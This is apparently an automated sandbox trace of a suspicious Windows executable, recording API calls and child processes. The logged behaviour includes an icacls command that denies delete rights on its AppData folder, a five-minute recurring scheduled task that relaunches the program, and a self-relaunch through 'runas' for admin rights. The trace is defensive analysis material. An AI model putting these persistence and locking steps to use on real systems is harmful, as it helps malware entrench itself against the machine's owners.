lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0155.427] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d480*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d4dc | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18d4dc*(hProcess=0x5c0, hThread=0x5c4, dwProcessId=0xa90, dwThreadId=0xaa4)) returned 1 [0155.453] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.464] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.480] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.696] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.839] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.855] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.870] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.886] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.901] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.917] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.933] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.948] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.964] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0155.979] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x0 [0155.984] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31dca88 | out: hHeap=0x260000) returned 1 [0155.984] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3226718 | out: hHeap=0x260000) returned 1 [0155.984] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x3205818 [0155.984] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x3213d58 [0155.992] CoInitialize (pvReserved=0x0) returned 0x0 [0156.930] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0156.932] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x320a800 [0156.932] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d544 | out: ppv=0x18d544*=0x29b08e0) returned 0x0 [0157.470] TaskScheduler:ITaskService:Connect (This=0x29b08e0, serverName=0x18cfd0*(varType=0x0, wReserved1=0x320, wReserved2=0x5810, wReserved3=0x320, varVal1=0x97, varVal2=0x130), user=0x18cfe0*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x138), domain=0x18cff0*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), password=0x18d000*(varType=0x0, wReserved1=0x323, wReserved2=0xd4ec, wReserved3=0x18, varVal1=0x420cab, varVal2=0x260000)) returned 0x0 [0157.541] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f08 [0157.541] TaskScheduler:ITaskService:GetFolder (in: This=0x29b08e0, Path="\\", ppFolder=0x18d54c | out: ppFolder=0x18d54c*=0x76ff98) returned 0x0 [0157.547] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f08 | out: hHeap=0x260000) returned 1 [0157.547] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f08 [0157.547] ITaskFolder:DeleteTask (This=0x76ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0157.552] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f08 | out: hHeap=0x260000) returned 1 [0157.553] TaskScheduler:ITaskService:NewTask (in: This=0x29b08e0, flags=0x0, ppDefinition=0x18d550 | out: ppDefinition=0x18d550*=0x29b0968) returned 0x0 [0157.557] TaskScheduler:IUnknown:Release (This=0x29b08e0) returned 0x1 [0157.557] ITaskDefinition:get_RegistrationInfo (in: This=0x29b0968, ppRegistrationInfo=0x18d524 | out: ppRegistrationInfo=0x18d524*=0x29b0a28) returned 0x0 [0157.557] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.557] IRegistrationInfo:put_Author (This=0x29b0a28, Author="Author Name") returned 0x0 [0157.557] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.557] IUnknown:Release (This=0x29b0a28) returned 0x1 [0157.557] ITaskDefinition:get_Principal (in: This=0x29b0968, ppPrincipal=0x18d52c | out: ppPrincipal=0x18d52c*=0x29b0bb8) returned 0x0 [0157.557] IPrincipal:put_LogonType (This=0x29b0bb8, LogonType=3) returned 0x0 [0157.558] IUnknown:Release (This=0x29b0bb8) returned 0x1 [0157.558] ITaskDefinition:get_Settings (in: This=0x29b0968, ppSettings=0x18d534 | out: ppSettings=0x18d534*=0x29b0ad8) returned 0x0 [0157.558] ITaskSettings:put_StartWhenAvailable (This=0x29b0ad8, StartWhenAvailable=1) returned 0x0 [0157.558] IUnknown:Release (This=0x29b0ad8) returned 0x1 [0157.558] ITaskSettings:get_IdleSettings (in: This=0x29b0ad8, ppIdleSettings=0x18d518 | out: ppIdleSettings=0x18d518*=0x29b0b48) returned 0x0 [0157.558] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.558] IIdleSettings:put_WaitTimeout (This=0x29b0b48, WaitTimeout="PT5M") returned 0x0 [0157.559] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.559] IUnknown:Release (This=0x29b0b48) returned 0x1 [0157.559] ITaskDefinition:get_Triggers (in: This=0x29b0968, ppTriggers=0x18d514 | out: ppTriggers=0x18d514*=0x29b0a98) returned 0x0 [0157.559] ITriggerCollection:Create (in: This=0x29b0a98, Type=1, ppTrigger=0x18d520 | out: ppTrigger=0x18d520*=0x29b0c18) returned 0x0 [0157.559] IUnknown:Release (This=0x29b0a98) returned 0x1 [0157.559] IUnknown:QueryInterface (in: This=0x29b0c18, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d53c | out: ppvObject=0x18d53c*=0x29b0c18) returned 0x0 [0157.559] IUnknown:Release (This=0x29b0c18) returned 0x2 [0157.559] ITrigger:get_Repetition (in: This=0x29b0c18, ppRepeat=0x18d528 | out: ppRepeat=0x18d528*=0x29b0c68) returned 0x0 [0157.559] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.559] IRepetitionPattern:put_Interval (This=0x29b0c68, Interval="PT5M") returned 0x0 [0157.560] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.560] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.560] IRepetitionPattern:put_Duration (This=0x29b0c68, Duration="") returned 0x0 [0157.562] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.563] ITrigger:put_Repetition (This=0x29b0c18, Repetition=0x29b0c68) returned 0x0 [0157.563] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.563] ITrigger:put_Id (This=0x29b0c18, Id="Trigger1") returned 0x0 [0157.563] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.563] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.564] ITrigger:put_EndBoundary (This=0x29b0c18, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0157.564] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.564] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18cffc | out: lpSystemTimeAsFileTime=0x18cffc*(dwLowDateTime=0x96b61400, dwHighDateTime=0x1d60e72)) [0157.583] GetLastError () returned 0x0 [0157.600] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x24) returned 0x324b7d8 [0157.608] GetLastError () returned 0x0 [0157.617] GetLastError () returned 0x0 [0157.625] GetLastError () returned 0x0 [0157.642] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x1 [0157.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cf64 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18cf64) returned 26 [0157.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cf64 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18cf64) returned 26 [0157.714] GetLastError () returned 0x0 [0157.714] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x24) returned 0x324b658 [0157.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x324b658, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0157.714] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x31e98f8 [0157.714] GetLastError () returned 0x0 [0157.714] ITrigger:put_StartBoundary (This=0x29b0c18, StartBoundary="2020-04-09T23:29:07") returned 0x0 [0157.714] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.714] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x326b688 | out: hHeap=0x260000) returned 1 [0157.715] IUnknown:Release (This=0x29b0c18) returned 0x1 [0157.715] ITaskDefinition:get_Actions (in: This=0x29b0968, ppActions=0x18d530 | out: ppActions=0x18d530*=0x29b09e0) returned 0x0 [0157.715] IActionCollection:Create (in: This=0x29b09e0, Type=0, ppAction=0x18d51c | out: ppAction=0x18d51c*=0x29b0ca0) returned 0x0 [0157.717] IUnknown:Release (This=0x29b09e0) returned 0x1 [0157.717] IUnknown:QueryInterface (in: This=0x29b0ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d538 | out: ppvObject=0x18d538*=0x29b0ca0) returned 0x0 [0157.717] IUnknown:Release (This=0x29b0ca0) returned 0x2 [0157.717] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.717] IExecAction:put_Path (This=0x29b0ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned 0x0 [0157.717] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.717] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.717] IExecAction:put_Arguments (This=0x29b0ca0, Arguments="--Task") returned 0x0 [0157.717] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0157.717] IUnknown:Release (This=0x29b0ca0) returned 0x1 [0157.717] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x3229f38 [0157.718] ITaskFolder:RegisterTaskDefinition (in: This=0x76ff98, Path="Time Trigger Task", pDefinition=0x29b0968, flags=6, UserId=0x18cfd8*(varType=0x0, wReserved1=0x323, wReserved2=0xd4ec, wReserved3=0x18, varVal1=0x420cab, varVal2=0x260000), password=0x18cfe8*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), LogonType=3, sddl=0x18cffc*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x138), ppTask=0x18d504 | out: ppTask=0x18d504*=0x29b0d10) returned 0x0 [0158.092] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3229f38 | out: hHeap=0x260000) returned 1 [0158.092] TaskScheduler:IUnknown:Release (This=0x76ff98) returned 0x0 [0158.092] TaskScheduler:IUnknown:Release (This=0x29b0968) returned 0x0 [0158.092] IUnknown:Release (This=0x29b0d10) returned 0x0 [0158.092] CoUninitialize () [0158.096] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x320a800 | out: hHeap=0x260000) returned 1 [0158.096] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3213d58 | out: hHeap=0x260000) returned 1 [0158.096] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3205818 | out: hHeap=0x260000) returned 1 [0158.097] GetVersion () returned 0x1db10106 [0158.097] lstrcpyW (in: lpString1=0x18d968, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0158.097] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0158.097] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0158.097] ShellExecuteExW (in: pExecInfo=0x18d72c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18d72c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0158.392] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31dc9d0 | out: hHeap=0x260000) returned 1 [0158.392] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x32132e0 | out: hHeap=0x260000) returned 1 [0158.392] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x323daa8 | out: hHeap=0x260000) returned 1 [0158.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2ae0f8 | out: hHeap=0x260000) returned 1 [0158.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e930 | out: hHeap=0x260000) returned 1 [0158.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x323e2b0 | out: hHeap=0x260000) returned 1 [0158.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x32462e0 | out: hHeap=0x260000) returned 1 [0158.473] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x281fe8 | out: hHeap=0x260000) returned 1 [0158.482] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2800b0 | out: hHeap=0x260000) returned 1 [0158.482] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18e9f0 | out: phModule=0x18e9f0) returned 0 [0158.483] ExitProcess (uExitCode=0x0) [0158.539] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x324b7d8 | out: hHeap=0x260000) returned 1 [0158.540] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27f4e0 | out: hHeap=0x260000) returned 1 [0158.576] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0xa54 Thread: id = 3 os_tid = 0xb00 Thread: id = 4 os_tid = 0xb0 Thread: id = 5 os_tid = 0xa50 Thread: id = 6 os_tid = 0x1c4 Thread: id = 7 os_tid = 0x918 Thread: id = 20 os_tid = 0xa80 Thread: id = 21 os_tid = 0xa84 Thread: id = 66 os_tid = 0xa98 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0x898 Thread: id = 9 os_tid = 0xa38 Thread: id = 10 os_tid = 0x768 Thread: id = 11 os_tid = 0x764 Thread: id = 12 os_tid = 0x724 Thread: id = 13 os_tid = 0x718 Thread: id = 14 os_tid = 0x714 Thread: id = 15 os_tid = 0x154 Thread: id = 16 os_tid = 0x150 Thread: id = 17 os_tid = 0x120 Thread: id = 18 os_tid = 0x118 Thread: id = 19 os_tid = 0xf0 Thread: id = 93 os_tid = 0x490 Thread: id = 94 os_tid = 0x7ac Thread: id = 95 os_tid = 0x838 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 22 os_tid = 0x908 Thread: id = 23 os_tid = 0x8f8 Thread: id = 24 os_tid = 0x688 Thread: id = 25 os_tid = 0x3b4 Thread: id = 26 os_tid = 0x308 Thread: id = 27 os_tid = 0xa58 Thread: id = 28 os_tid = 0xa6c Thread: id = 29 os_tid = 0x618 Thread: id = 30 os_tid = 0x9d8 Thread: id = 31 os_tid = 0x320 Thread: id = 32 os_tid = 0x42c Thread: id = 33 os_tid = 0x1e4 Thread: id = 34 os_tid = 0x6d0 Thread: id = 35 os_tid = 0x6bc Thread: id = 36 os_tid = 0x6b8 Thread: id = 37 os_tid = 0x6b0 Thread: id = 38 os_tid = 0x6a8 Thread: id = 39 os_tid = 0x698 Thread: id = 40 os_tid = 0x684 Thread: id = 41 os_tid = 0x678 Thread: id = 42 os_tid = 0x4a8 Thread: id = 43 os_tid = 0x46c Thread: id = 44 os_tid = 0x44c Thread: id = 45 os_tid = 0x424 Thread: id = 46 os_tid = 0x420 Thread: id = 47 os_tid = 0x41c Thread: id = 48 os_tid = 0x404 Thread: id = 49 os_tid = 0x14c Thread: id = 50 os_tid = 0x3fc Thread: id = 51 os_tid = 0x3f4 Thread: id = 52 os_tid = 0x3e8 Thread: id = 53 os_tid = 0x39c Thread: id = 54 os_tid = 0x390 Thread: id = 55 os_tid = 0x388 Thread: id = 56 os_tid = 0x37c Thread: id = 57 os_tid = 0x374 Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x3fe4c000" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 58 os_tid = 0xaa4 Thread: id = 59 os_tid = 0xa7c Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 60 os_tid = 0x568 Thread: id = 61 os_tid = 0x5b4 Thread: id = 62 os_tid = 0x5b0 Thread: id = 63 os_tid = 0x59c Thread: id = 64 os_tid = 0x594 Thread: id = 65 os_tid = 0x58c Thread: id = 89 os_tid = 0x24c Thread: id = 92 os_tid = 0x38c Process: id = "6" image_name = "cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe" page_root = "0x1af32000" os_pid = "0xabc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 67 os_tid = 0x524 [0158.846] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x975f15a0, dwHighDateTime=0x1d60e72)) [0158.847] GetCurrentProcessId () returned 0xabc [0158.847] GetCurrentThreadId () returned 0x524 [0158.847] GetTickCount () returned 0x1153997 [0158.847] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=27890679787) returned 1 [0158.911] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 